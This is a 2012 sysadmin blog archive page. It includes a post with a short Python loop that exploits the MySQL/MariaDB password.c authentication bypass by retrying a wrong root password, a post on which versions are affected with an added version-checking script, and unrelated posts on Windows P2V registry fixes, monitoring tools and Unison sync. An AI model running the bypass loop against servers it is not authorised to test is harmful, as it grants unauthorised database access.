Posts

Showing posts from June, 2012

Python Script to Test MySQL password.c hack

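vi /root/MySQLByPass.py
==========
#!/usr/bin/python
import subprocess

# Keep retrying the same wrong password against the local server;
# on an affected build one of the attempts is eventually accepted.
while 1:
    subprocess.Popen("mysql -u root mysql --password=xx", shell=True).wait()
==========
python /root/MySQLByPass.py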

Security vulnerability in MySQL/MariaDB

A vulnerability has been identified in MySQL and MariaDB. Under specific conditions an attacker can provide any password and it will be accepted. The affected source file is password.c; a more detailed explanation and a fix can be found at http://seclists.org/oss-sec/2012/q2/493

All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

If you know a username (root in most cases), a situation arises where, if you connect approximately 250 to 300 times, MySQL will allow you to connect without any password.
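To find which servers need the upgrade, the version list above can be turned into a check over an inventory of server version strings. This is an added example, not code from the original post; the host names and banners are constructed, and treating series older than 5.1 as vulnerable and series newer than the last listed one as fixed is an assumed reading of "up to" and "from".

```python
import re

# Version boundaries exactly as listed in the post.
LAST_VULNERABLE = {(5, 1): 61, (5, 2): 11, (5, 3): 5, (5, 5): 22}
FIRST_FIXED = {
    "mariadb": {(5, 1): 62, (5, 2): 12, (5, 3): 6, (5, 5): 23},
    "mysql": {(5, 1): 63, (5, 5): 24, (5, 6): 6},
}


def classify(version_string):
    """Return 'vulnerable', 'fixed' or 'unknown' for a server version string
    as reported by SELECT VERSION() or the handshake banner."""
    flavor = "mariadb" if "mariadb" in version_string.lower() else "mysql"
    # MariaDB 10+ prefixes its handshake banner with a fake "5.5.5-";
    # drop it so the real version is the one that gets compared.
    cleaned = re.sub(r"^5\.5\.5-(?=\d+\.\d+\.\d+)", "", version_string.strip())
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", cleaned)
    if not m:
        return "unknown"
    major, minor, patch = (int(g) for g in m.groups())
    series = (major, minor)
    if series < (5, 1):
        return "vulnerable"  # assumed reading of "all versions up to 5.1.61"
    last_vuln = LAST_VULNERABLE.get(series)
    if last_vuln is not None and patch <= last_vuln:
        return "vulnerable"
    fixed = FIRST_FIXED[flavor]
    if series in fixed:
        # Releases that fall between the two lists (e.g. MySQL 5.5.23)
        # are not covered by the post, so they stay 'unknown'.
        return "fixed" if patch >= fixed[series] else "unknown"
    if series > max(fixed):
        return "fixed"  # assumed reading of "versions from ..."
    return "unknown"


def audit(inventory):
    """Return the sorted host names whose version is in the vulnerable range."""
    return sorted(h for h, v in inventory.items() if classify(v) == "vulnerable")


# Constructed sample inventory (hypothetical host names and banners).
SAMPLE = {"db-a": "5.5.22-0ubuntu1", "db-b": "5.5.23-MariaDB-log",
          "db-c": "5.5.23", "db-d": "5.5.5-10.1.48-MariaDB-0+deb9u2",
          "db-e": "5.1.61-community"}

if __name__ == "__main__":
    print(audit(SAMPLE))
```

A version in the vulnerable range only marks a host as a candidate, since the post notes the flaw applies under specific conditions; hosts reported as 'unknown' should be checked by hand.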

Windows 7 P2V 0xc0000225 and 0x0000007b Error

This was a procedure I found on the web to resolve errors 0xc0000225 and 0x0000007b when booting a virtual Windows 7 system after performing a P2V.

1. Mount the Win7 DVD in VMware Workstation using the removable media options, or else change the BIOS setting in the VM so it will boot from an ISO image.
2. At the first screen (Language Selection), hit Shift-F10 for a command prompt.
3. Run Regedit.
4. Highlight HKEY_LOCAL_MACHINE.
5. Load the system hive from the VM's disk: File > Load Hive.
6. Select < c: > \Windows\System32\config\system
7. Regedit will ask for a Key name: name it something like "asdf".
8. Expand HKEY_LOCAL_MACHINE\asdf\ControlSet001\Services\intelide
9. Change the data for value "Start" from "3" to "0".
10. For each service listed below under HKLM/System/CurrentControlSet001/Services/ set the "Start" parameter to the corresponding value from the list below:

Aliide = 3
Amdide = 3
Atapi = 0
Cmdide = 3
iaStorV = 3
intelide = 0

Chive May Replace phpmyadmin

Chive is a Web 2.0 front end for SQL database management. http://www.chive-project.com/

Simple Windows Monitoring with PolyMon

PolyMon is an open source system monitoring solution that can be used to generate email alerts and analyze historical trends of monitor counters and monitor statuses. It is based on the .NET 2.0 framework and SQL Server 2005. The most recent version integrates with Visual Studio 2010. http://polymon.codeplex.com/ I write some software using VB.NET and C#, and this is ideal as an add-on, where I can extend it to allow me to monitor application-specific logs.

Using Unison to Take MySQL Copy

Recently I needed to take a copy of a MySQL database dump on a regular basis from a remote CentOS database server hosted in a data centre in the UK, on to a Windows Server based in Ireland also running a similar version of MySQL. We require a copy of the data on an hourly basis, so I decided to try out unison to synchronize folders between a remote server and a local Windows Server. Firstly, download unison from http://www.cis.upenn.edu/~bcpierce/unison/download.html When I downloaded the latest binary option for Windows I got two files: one is the text/command line tool and the other is an application based on GTK. I took a copy of the command line application, created a folder called c:\unison and dropped my file into that folder. You will also need to grab a copy of an SSH client that will run under Windows. You can go with something like Cygwin, but I wanted something that was quick to install and had a small footprint, so I selected OpenSSH for Window